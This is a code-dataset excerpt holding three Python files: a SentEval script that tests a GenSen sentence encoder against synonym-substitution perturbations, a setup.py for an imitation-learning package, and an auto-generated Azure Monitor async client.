word2id = {}
for i, (w, _) in enumerate(sorted_words):
id2word.append(w)
word2id[w] = i
return id2word, word2id
# SentEval prepare and batcher
def prepare(params, samples):
_, params.word2id = create_dictionary(samples)
params.word_vec = get_wordvec(PATH_TO_VEC, params.word2id)
params.wvec_dim = 300
return
def get_wordvec(path_to_vec, word2id):
word_vec = {}
with io.open(path_to_vec, 'r', encoding='utf-8') as f:
# if word2vec or fasttext file : skip first line "next(f)"
for line in f:
word, vec = line.split(' ', 1)
if word in word2id:
word_vec[word] = np.fromstring(vec, sep=' ')
logging.info('Found {0} words with word vectors, out of \
{1} words'.format(len(word_vec), len(word2id)))
return word_vec
def batcher(params, batch):
batch = [' '.join(sent) if sent != [] else '.' for sent in batch]
_, reps_h_t = gensen_encoder.get_representation(
batch, pool='last', return_numpy=True, tokenize=True
)
embeddings = reps_h_t
return embeddings
def prepare_adversarial_samples(params, sentences, y_labels):
new_sentences = []
new_labels = []
for sent, label in zip(sentences, y_labels):
sent_adversaries = []
sent_adv_labels = []
new_sent = list(sent)
sent_adversaries.append(new_sent)
sent_adv_labels.append(label)
new_sent = list(sent)
sent_adversaries.append(new_sent)
sent_adv_labels.append(label)
# if sent == sentences[43]:
# print("orig sent vec", get_sentence(sent), " ,label:", label)
# print("mod sent vec", get_sentence(new_sent))
for word, word_pos in zip(sent, range(len(sent))):
# print "new word ", word, "-" *80
if word in params.word_vec:
# print word, "-" * 30
# print params.word_vec[word][:20]
new_sent = list(sent)
# print "new sent vec ", "-" * 30
# print new_sentvec[:20]
word_syns = WordNetSynonym.get_word_synonym(word)
# print word_syns
for syn in word_syns:
if syn in params.word_vec:
if syn == word:
continue
# print syn, "-"*30
# print params.word_vec[syn][:20]
new_sent = list(sent)
new_sent[word_pos] = syn
sent_adversaries.append(new_sent)
sent_adv_labels.append(label)
# if sent == sentences[43]:
# print("mod sent vec", get_sentence(new_sent))
# print "mod sent vec", "-" * 30
# print modified_vecs[len(modified_vecs)-1][:20], "\n"
new_sentences.append(sent_adversaries)
new_labels.append(sent_adv_labels)
return new_sentences, new_labels
def adversarialFunc(params, batch_sentences, batch_labels, embeddings = None):
# sentvec = np.multiply(sentvec, params.wvec_dim)
adv_batch_sentences, adv_labels = prepare_adversarial_samples(params, batch_sentences, batch_labels)
print("adv samples size %d",len(adv_batch_sentences))
total_count = sum(len(x) for x in adv_batch_sentences)
print("sum of sentences called %d, batch_size %d" %(total_count, params.batch_size))
adv_embeddings = []
for sent_adversaries, i in zip(adv_batch_sentences, range(len(adv_batch_sentences))):
sentences = [' '.join(sent) if sent != [] else '.' for sent in sent_adversaries]
_, reps_h_t = gensen_encoder.get_representation(
sentences, pool='last', return_numpy=True, tokenize=True
)
sent_adv_embeddings = reps_h_t
# sent_adv_embeddings = params.infersent.encode_without_shuffle(sentences, bsize=params.batch_size, tokenize=False)
adv_embeddings.append(sent_adv_embeddings)
if i%10 == 0:
print("%d sentences done"%(i))
# print("Adv embeddings shape: %s, adv_labels shape", len(sent_adv_embeddings), dim(adv_labels[i]))
print("Adv embeddings shape: %s, adv_labels shape %s" %(len(adv_embeddings), len(adv_labels)))
for i in range(0,len(adv_embeddings),10):
print("Adv embeddings shape: %s, adv_labels shape", len(adv_embeddings[i]), len(adv_labels[i]))
return adv_embeddings, adv_labels, adv_batch_sentences
# Load GenSen model
gensen_1 = GenSenSingle(
model_folder='../data/models',
filename_prefix='nli_large_bothskip',
pretrained_emb='fasttext/glove.840B.300d.h5'
)
gensen_2 = GenSenSingle(
model_folder='../data/models',
filename_prefix='nli_large_bothskip_parse',
pretrained_emb='fasttext/glove.840B.300d.h5'
)
gensen_encoder = GenSen(gensen_1, gensen_2)
# reps_h, reps_h_t = gensen_encoder.get_representation(
# sentences, pool='last', return_numpy=True, tokenize=True
# )
# Set params for SentEval
params_senteval = {'task_path': PATH_TO_DATA, 'usepytorch': True, 'kfold': 5, 'model_name': 'gensen','batch_size': 128}
params_senteval['classifier'] = {'nhid': 0, 'optim': 'rmsprop', 'batch_size': 128,
'tenacity': 3, 'epoch_size': 2, 'cudaEfficient' : True}
params_senteval['gensen'] = gensen_encoder
# Set up logger
logging.basicConfig(format='%(asctime)s : %(message)s', level=logging.DEBUG, adversarialFunc=adversarialFunc)
if __name__ == "__main__":
se = senteval.engine.SE(params_senteval, batcher, prepare, adversarialFunc=adversarialFunc)
# transfer_tasks = ['STS12', 'STS13', 'STS14', 'STS15', 'STS16',
# 'MR', 'CR', 'MPQA', 'SUBJ', 'SST2', 'SST5', 'TREC', 'MRPC',
# 'SICKEntailment', 'SICKRelatedness', 'STSBenchmark',
# 'Length', 'WordContent', 'Depth', 'TopConstituents',
# 'BigramShift', 'Tense', 'SubjNumber', 'ObjNumber',
# 'OddManOut', 'CoordinationInversion']
transfer_tasks = ['STSBenchmark']
results = se.eval(transfer_tasks)
# print(results)
| 32.589744
| 123
| 0.621558
|
from __future__ import absolute_import, division, unicode_literals
import sys
import logging
from gensen import GenSen, GenSenSingle
import gensen
import numpy as np
PATH_TO_SENTEVAL = '../'
PATH_TO_DATA = '../data'
PATH_TO_VEC = 'fasttext/crawl-300d-2M.vec'
sys.path.insert(0, PATH_TO_SENTEVAL)
import senteval
sys.path.insert(1,PATH_TO_SENTEVAL)
from AdversarialModels import WordNetSynonym
import io
def get_sentence(sentence):
sent = ""
for word in sentence:
sent+=word+" "
return sent
def create_dictionary(sentences, threshold=0):
words = {}
for s in sentences:
for word in s:
words[word] = words.get(word, 0) + 1
if threshold > 0:
newwords = {}
for word in words:
if words[word] >= threshold:
newwords[word] = words[word]
words = newwords
words['<s>'] = 1e9 + 4
words['</s>'] = 1e9 + 3
words['<p>'] = 1e9 + 2
sorted_words = sorted(words.items(), key=lambda x: -x[1])
id2word = []
word2id = {}
for i, (w, _) in enumerate(sorted_words):
id2word.append(w)
word2id[w] = i
return id2word, word2id
def prepare(params, samples):
_, params.word2id = create_dictionary(samples)
params.word_vec = get_wordvec(PATH_TO_VEC, params.word2id)
params.wvec_dim = 300
return
def get_wordvec(path_to_vec, word2id):
word_vec = {}
with io.open(path_to_vec, 'r', encoding='utf-8') as f:
for line in f:
word, vec = line.split(' ', 1)
if word in word2id:
word_vec[word] = np.fromstring(vec, sep=' ')
logging.info('Found {0} words with word vectors, out of \
{1} words'.format(len(word_vec), len(word2id)))
return word_vec
def batcher(params, batch):
batch = [' '.join(sent) if sent != [] else '.' for sent in batch]
_, reps_h_t = gensen_encoder.get_representation(
batch, pool='last', return_numpy=True, tokenize=True
)
embeddings = reps_h_t
return embeddings
def prepare_adversarial_samples(params, sentences, y_labels):
new_sentences = []
new_labels = []
for sent, label in zip(sentences, y_labels):
sent_adversaries = []
sent_adv_labels = []
new_sent = list(sent)
sent_adversaries.append(new_sent)
sent_adv_labels.append(label)
new_sent = list(sent)
sent_adversaries.append(new_sent)
sent_adv_labels.append(label)
for word, word_pos in zip(sent, range(len(sent))):
if word in params.word_vec:
new_sent = list(sent)
word_syns = WordNetSynonym.get_word_synonym(word)
for syn in word_syns:
if syn in params.word_vec:
if syn == word:
continue
new_sent = list(sent)
new_sent[word_pos] = syn
sent_adversaries.append(new_sent)
sent_adv_labels.append(label)
new_sentences.append(sent_adversaries)
new_labels.append(sent_adv_labels)
return new_sentences, new_labels
def adversarialFunc(params, batch_sentences, batch_labels, embeddings = None):
adv_batch_sentences, adv_labels = prepare_adversarial_samples(params, batch_sentences, batch_labels)
print("adv samples size %d",len(adv_batch_sentences))
total_count = sum(len(x) for x in adv_batch_sentences)
print("sum of sentences called %d, batch_size %d" %(total_count, params.batch_size))
adv_embeddings = []
for sent_adversaries, i in zip(adv_batch_sentences, range(len(adv_batch_sentences))):
sentences = [' '.join(sent) if sent != [] else '.' for sent in sent_adversaries]
_, reps_h_t = gensen_encoder.get_representation(
sentences, pool='last', return_numpy=True, tokenize=True
)
sent_adv_embeddings = reps_h_t
adv_embeddings.append(sent_adv_embeddings)
if i%10 == 0:
print("%d sentences done"%(i))
print("Adv embeddings shape: %s, adv_labels shape %s" %(len(adv_embeddings), len(adv_labels)))
for i in range(0,len(adv_embeddings),10):
print("Adv embeddings shape: %s, adv_labels shape", len(adv_embeddings[i]), len(adv_labels[i]))
return adv_embeddings, adv_labels, adv_batch_sentences
gensen_1 = GenSenSingle(
model_folder='../data/models',
filename_prefix='nli_large_bothskip',
pretrained_emb='fasttext/glove.840B.300d.h5'
)
gensen_2 = GenSenSingle(
model_folder='../data/models',
filename_prefix='nli_large_bothskip_parse',
pretrained_emb='fasttext/glove.840B.300d.h5'
)
gensen_encoder = GenSen(gensen_1, gensen_2)
params_senteval = {'task_path': PATH_TO_DATA, 'usepytorch': True, 'kfold': 5, 'model_name': 'gensen','batch_size': 128}
params_senteval['classifier'] = {'nhid': 0, 'optim': 'rmsprop', 'batch_size': 128,
'tenacity': 3, 'epoch_size': 2, 'cudaEfficient' : True}
params_senteval['gensen'] = gensen_encoder
logging.basicConfig(format='%(asctime)s : %(message)s', level=logging.DEBUG, adversarialFunc=adversarialFunc)
if __name__ == "__main__":
se = senteval.engine.SE(params_senteval, batcher, prepare, adversarialFunc=adversarialFunc)
transfer_tasks = ['STSBenchmark']
results = se.eval(transfer_tasks)
| true
| true
|
1c424c5b0f0ac998a7628cfec79e85809197b4fa
| 439
|
py
|
Python
|
setup.py
|
Kailiangdong/hgail
|
a668c4dda09d4e7f85b4640f42ff57b6764d24cc
|
[
"MIT"
] | 24
|
2018-03-16T22:29:16.000Z
|
2021-11-12T07:33:28.000Z
|
setup.py
|
Kailiangdong/hgail
|
a668c4dda09d4e7f85b4640f42ff57b6764d24cc
|
[
"MIT"
] | 2
|
2018-06-29T06:37:46.000Z
|
2018-08-06T01:02:13.000Z
|
setup.py
|
Kailiangdong/hgail
|
a668c4dda09d4e7f85b4640f42ff57b6764d24cc
|
[
"MIT"
] | 15
|
2018-07-30T16:46:07.000Z
|
2022-03-13T06:24:11.000Z
|
from setuptools import setup
setup(name='hgail',
version='0.1',
description='Generative Adversarial Imitation Learning',
author='Blake Wulfe',
author_email='wulfebw@stanford.edu',
license='MIT',
packages=['hgail'],
zip_safe=False,
install_requires=[
'numpy',
'rllab',
'tensorflow',
'gym',
'h5py',
'cached_property',
'joblib',
])
| 23.105263
| 62
| 0.553531
|
from setuptools import setup
setup(name='hgail',
version='0.1',
description='Generative Adversarial Imitation Learning',
author='Blake Wulfe',
author_email='wulfebw@stanford.edu',
license='MIT',
packages=['hgail'],
zip_safe=False,
install_requires=[
'numpy',
'rllab',
'tensorflow',
'gym',
'h5py',
'cached_property',
'joblib',
])
| true
| true
|
1c424ce98abcf0f737bebde30fff739a28e3c53b
| 2,806
|
py
|
Python
|
sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2016_09_01/aio/_monitor_management_client.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 3
|
2020-06-23T02:25:27.000Z
|
2021-09-07T18:48:11.000Z
|
sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2016_09_01/aio/_monitor_management_client.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 510
|
2019-07-17T16:11:19.000Z
|
2021-08-02T08:38:32.000Z
|
sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2016_09_01/aio/_monitor_management_client.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 5
|
2019-09-04T12:51:37.000Z
|
2020-09-16T07:28:40.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration import MonitorManagementClientConfiguration
from .operations import MetricsOperations
from .operations import ServiceDiagnosticSettingsOperations
from .. import models
class MonitorManagementClient(object):
"""Monitor Management Client.
:ivar metrics: MetricsOperations operations
:vartype metrics: $(python-base-namespace).v2016_09_01.aio.operations.MetricsOperations
:ivar service_diagnostic_settings: ServiceDiagnosticSettingsOperations operations
:vartype service_diagnostic_settings: $(python-base-namespace).v2016_09_01.aio.operations.ServiceDiagnosticSettingsOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param str base_url: Service URL
"""
def __init__(
self,
credential: "AsyncTokenCredential",
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = MonitorManagementClientConfiguration(credential, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.metrics = MetricsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.service_diagnostic_settings = ServiceDiagnosticSettingsOperations(
self._client, self._config, self._serialize, self._deserialize)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "MonitorManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
| 42.515152
| 129
| 0.705987
|
from typing import Any, Optional, TYPE_CHECKING
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration import MonitorManagementClientConfiguration
from .operations import MetricsOperations
from .operations import ServiceDiagnosticSettingsOperations
from .. import models
class MonitorManagementClient(object):
def __init__(
self,
credential: "AsyncTokenCredential",
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = MonitorManagementClientConfiguration(credential, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.metrics = MetricsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.service_diagnostic_settings = ServiceDiagnosticSettingsOperations(
self._client, self._config, self._serialize, self._deserialize)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "MonitorManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.